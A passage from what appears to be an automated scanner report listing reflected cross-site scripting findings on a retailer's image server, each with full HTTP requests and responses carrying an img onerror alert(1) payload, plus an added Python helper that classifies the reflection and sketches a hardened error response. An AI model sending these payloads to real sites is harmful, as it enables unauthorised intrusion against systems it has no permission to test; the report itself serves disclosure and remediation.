Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 82
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:59 GMT
Connection: close

Unable to find /pacsun/newMega_092811b8f7f7<img src=a onerror=alert(1)>ad010335fe7

3.116. http://images3.pacsun.com/is/image/pacsun/pop_email_011011b [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/pop_email_011011b

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9ca3c<img%20src%3da%20onerror%3dalert(1)>f9e63221fc9 was submitted in the REST URL parameter 4. This input was echoed as 9ca3c<img src=a onerror=alert(1)>f9e63221fc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/pop_email_011011b9ca3c<img%20src%3da%20onerror%3dalert(1)>f9e63221fc9?$img_jpg$&$ext=.jpg HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:06 GMT
Connection: close

Unable to find /pacsun/pop_email_011011b9ca3c<img src=a onerror=alert(1)>f9e63221fc9

3.117. http://images3.pacsun.com/is/image/pacsun/redesign_social_51811 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/redesign_social_51811

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 78570<img%20src%3da%20onerror%3dalert(1)>025efdce66a was submitted in the REST URL parameter 4. This input was echoed as 78570<img src=a onerror=alert(1)>025efdce66a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsun/redesign_social_5181178570<img%20src%3da%20onerror%3dalert(1)>025efdce66a?$img_gif-alpha$&$ext=.gif HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:05:08 GMT
Connection: close

Unable to find /pacsun/redesign_social_5181178570<img src=a onerror=alert(1)>025efdce66a
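The same question arises for every images3.pacsun.com finding in this section (3.117 through 3.132): the canary is echoed unencoded, but the response is text/plain, so a scanner's "Certain" cannot by itself mean script execution. The following triage helper is an added example, not part of the scanner report or of the image server's code. It parses a raw HTTP response (the one captured in 3.117 is embedded as sample input), checks whether the canary came back with its angle brackets intact, reads the Content-Type and X-Content-Type-Options headers that decide whether a browser would render the body as HTML, and then shows a hardened error response builder (hypothetical; the allowlist regex and the "the requested image" wording are assumptions) that the same check no longer flags.

```python
import html
import re

# Constructed sample input: the headers and body recorded in finding 3.117,
# reassembled as a raw HTTP response so the example runs offline.
SAMPLE_RESPONSE = (
    b"HTTP/1.1 403 Forbidden\r\n"
    b"Server: Apache-Coyote/1.1\r\n"
    b"Pragma: no-cache\r\n"
    b"Content-Type: text/plain\r\n"
    b"Content-Length: 88\r\n"
    b"Cache-Control: max-age=3600\r\n"
    b"Date: Fri, 30 Sep 2011 12:05:08 GMT\r\n"
    b"Connection: close\r\n"
    b"\r\n"
    b"Unable to find /pacsun/redesign_social_5181178570"
    b"<img src=a onerror=alert(1)>025efdce66a"
)
# The scanner's canary for 3.117: random prefix + payload + random suffix.
CANARY = "78570<img src=a onerror=alert(1)>025efdce66a"

# Assumed allowlist: asset names the server legitimately serves look like
# /pacsun/redesign_social_51811 or /pacsunproducts/7846660_sw_001, i.e.
# letters, digits, underscore, dot, hyphen and slash only.
SAFE_ASSET_NAME = re.compile(r"^[A-Za-z0-9_./-]+$")


def parse_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split(" ")[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body.decode("latin-1")


def classify_reflection(raw: bytes, canary: str) -> dict:
    """Decide whether a reflected canary is a rendered XSS or only an echo.

    Three things must line up for the PoC to fire: the canary comes back
    with '<' and '>' intact, the body is served as text/html (or the browser
    is allowed to sniff it into HTML), and nothing forbids that sniffing.
    """
    status, headers, body = parse_response(raw)
    content_type = headers.get("content-type", "").split(";")[0].strip().lower()
    nosniff = headers.get("x-content-type-options", "").strip().lower() == "nosniff"
    reflected_raw = canary in body
    reflected_escaped = (not reflected_raw) and html.escape(canary, quote=False) in body

    if reflected_raw and content_type == "text/html":
        verdict = "exploitable"
    elif reflected_raw and not nosniff:
        verdict = "reflected; depends on MIME sniffing"
    elif reflected_raw:
        verdict = "reflected; not rendered as HTML"
    else:
        verdict = "not reflected"

    return {
        "status": status,
        "content_type": content_type,
        "nosniff": nosniff,
        "reflected_raw": reflected_raw,
        "reflected_escaped": reflected_escaped,
        "verdict": verdict,
    }


def safe_not_found(asset_path: str) -> bytes:
    """Hardened error response (hypothetical; not the image server's code).

    Echo the requested name only when it matches the allowlist, otherwise
    substitute a fixed phrase; pin the content type with a charset and send
    nosniff so an echoed name can never be promoted to markup by the browser.
    """
    shown = asset_path if SAFE_ASSET_NAME.match(asset_path) else "the requested image"
    body = ("Unable to find " + shown).encode("utf-8")
    head = (
        b"HTTP/1.1 404 Not Found\r\n"
        b"Content-Type: text/plain; charset=utf-8\r\n"
        b"X-Content-Type-Options: nosniff\r\n"
        b"Content-Length: %d\r\n"
        b"Connection: close\r\n"
        b"\r\n" % len(body)
    )
    return head + body


if __name__ == "__main__":
    print(classify_reflection(SAMPLE_RESPONSE, CANARY))
    print(classify_reflection(safe_not_found("/pacsun/redesign_social_51811" + CANARY), CANARY))
```

Run against the captured 3.117 response the verdict is "reflected; depends on MIME sniffing", which is the honest reading of all sixteen findings: worth fixing, but not demonstrated to execute. Swap the Content-Type to text/html and the same response becomes "exploitable"; feed the hardened builder the tampered path and the canary is gone and nosniff is set.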

3.118. http://images3.pacsun.com/is/image/pacsun/topNavV3_hdrAccessories10Open [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/topNavV3_hdrAccessories10Open

Issue detail

The value of REST URL parameter 4 (the image asset name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload b04b3<img%20src%3da%20onerror%3dalert(1)>60a0eba2e53 was submitted in REST URL parameter 4 and was echoed as b04b3<img src=a onerror=alert(1)>60a0eba2e53 in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsun/topNavV3_hdrAccessories10Openb04b3<img%20src%3da%20onerror%3dalert(1)>60a0eba2e53?$img_gif-alpha$&$ext=.gif-alpha HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:58 GMT
Connection: close

Unable to find /pacsun/topNavV3_hdrAccessories10Openb04b3<img src=a onerror=alert(1)>60a0eba2e53

3.119. http://images3.pacsun.com/is/image/pacsun/topNavV3_shopByCat10Open [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/topNavV3_shopByCat10Open

Issue detail

The value of REST URL parameter 4 (the image asset name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload 68016<img%20src%3da%20onerror%3dalert(1)>2ef5a5bf0eb was submitted in REST URL parameter 4 and was echoed as 68016<img src=a onerror=alert(1)>2ef5a5bf0eb in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsun/topNavV3_shopByCat10Open68016<img%20src%3da%20onerror%3dalert(1)>2ef5a5bf0eb?$img_gif-alpha$&$ext=.gif-alpha HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 91
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:55 GMT
Connection: close

Unable to find /pacsun/topNavV3_shopByCat10Open68016<img src=a onerror=alert(1)>2ef5a5bf0eb

3.120. http://images3.pacsun.com/is/image/pacsun/womensMega_092811 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsun/womensMega_092811

Issue detail

The value of REST URL parameter 4 (the image asset name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload 9d8e6<img%20src%3da%20onerror%3dalert(1)>23eed6dea83 was submitted in REST URL parameter 4 and was echoed as 9d8e6<img src=a onerror=alert(1)>23eed6dea83 in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsun/womensMega_0928119d8e6<img%20src%3da%20onerror%3dalert(1)>23eed6dea83?$img_jpg_full$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/home.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; mbox=check#true#1317384269|session#1317384208243-106173#1317386069; fsr.a=1317384208366

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 84
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:04:58 GMT
Connection: close

Unable to find /pacsun/womensMega_0928119d8e6<img src=a onerror=alert(1)>23eed6dea83

3.121. http://images3.pacsun.com/is/image/pacsunproducts/6108583M_01_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/6108583M_01_001

Issue detail

The value of REST URL parameter 4 (the product image name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload 6d4c3<img%20src%3da%20onerror%3dalert(1)>e79e5035c5e was submitted in REST URL parameter 4 and was echoed as 6d4c3<img src=a onerror=alert(1)>e79e5035c5e in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsunproducts/6108583M_01_0016d4c3<img%20src%3da%20onerror%3dalert(1)>e79e5035c5e?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 90
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/6108583M_01_0016d4c3<img src=a onerror=alert(1)>e79e5035c5e

3.122. http://images3.pacsun.com/is/image/pacsunproducts/7601511_01 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7601511_01

Issue detail

The value of REST URL parameter 4 (the product image name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload f70be<img%20src%3da%20onerror%3dalert(1)>e7af45d49d9 was submitted in REST URL parameter 4 and was echoed as f70be<img src=a onerror=alert(1)>e7af45d49d9 in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsunproducts/7601511_01f70be<img%20src%3da%20onerror%3dalert(1)>e7af45d49d9?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/7601511_01f70be<img src=a onerror=alert(1)>e7af45d49d9

3.123. http://images3.pacsun.com/is/image/pacsunproducts/7841695M_01_004 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7841695M_01_004

Issue detail

The value of REST URL parameter 4 (the product image name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload cffb6<img%20src%3da%20onerror%3dalert(1)>337232d97f9 was submitted in REST URL parameter 4 and was echoed as cffb6<img src=a onerror=alert(1)>337232d97f9 in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsunproducts/7841695M_01_004cffb6<img%20src%3da%20onerror%3dalert(1)>337232d97f9?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 90
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/7841695M_01_004cffb6<img src=a onerror=alert(1)>337232d97f9

3.124. http://images3.pacsun.com/is/image/pacsunproducts/7846660_sw_001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7846660_sw_001

Issue detail

The value of REST URL parameter 4 (the swatch image name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload 95688<img%20src%3da%20onerror%3dalert(1)>9c4f9081633 was submitted in REST URL parameter 4 and was echoed as 95688<img src=a onerror=alert(1)>9c4f9081633 in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsunproducts/7846660_sw_00195688<img%20src%3da%20onerror%3dalert(1)>9c4f9081633?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/7846660_sw_00195688<img src=a onerror=alert(1)>9c4f9081633

3.125. http://images3.pacsun.com/is/image/pacsunproducts/7846660_sw_549 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7846660_sw_549

Issue detail

The value of REST URL parameter 4 (the swatch image name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload 32fdf<img%20src%3da%20onerror%3dalert(1)>3a0ecae438c was submitted in REST URL parameter 4 and was echoed as 32fdf<img src=a onerror=alert(1)>3a0ecae438c in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsunproducts/7846660_sw_54932fdf<img%20src%3da%20onerror%3dalert(1)>3a0ecae438c?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/7846660_sw_54932fdf<img src=a onerror=alert(1)>3a0ecae438c

3.126. http://images3.pacsun.com/is/image/pacsunproducts/7914112_01_108 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/7914112_01_108

Issue detail

The value of REST URL parameter 4 (the product image name in the /is/image/ path) is copied unencoded into the body of the server's error response. The payload 96dcd<img%20src%3da%20onerror%3dalert(1)>49fb4dde708 was submitted in REST URL parameter 4 and was echoed as 96dcd<img src=a onerror=alert(1)>49fb4dde708 in the response.

The proof of concept relies on an img onerror event handler rather than a script tag, so it would execute as soon as a browser parsed the response as HTML. Note, however, that the response below is a 403 served with Content-Type: text/plain and without X-Content-Type-Options: nosniff: a browser that honours the declared type will display the payload as text, so whether this reflection is exploitable in practice depends on the victim browser's content sniffing. The Certain confidence applies to the unencoded echo, not to script execution. The fix is to stop echoing the requested name (or restrict it to an allowlist of filename characters) and to send nosniff on error responses.

Request

GET /is/image/pacsunproducts/7914112_01_10896dcd<img%20src%3da%20onerror%3dalert(1)>49fb4dde708?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
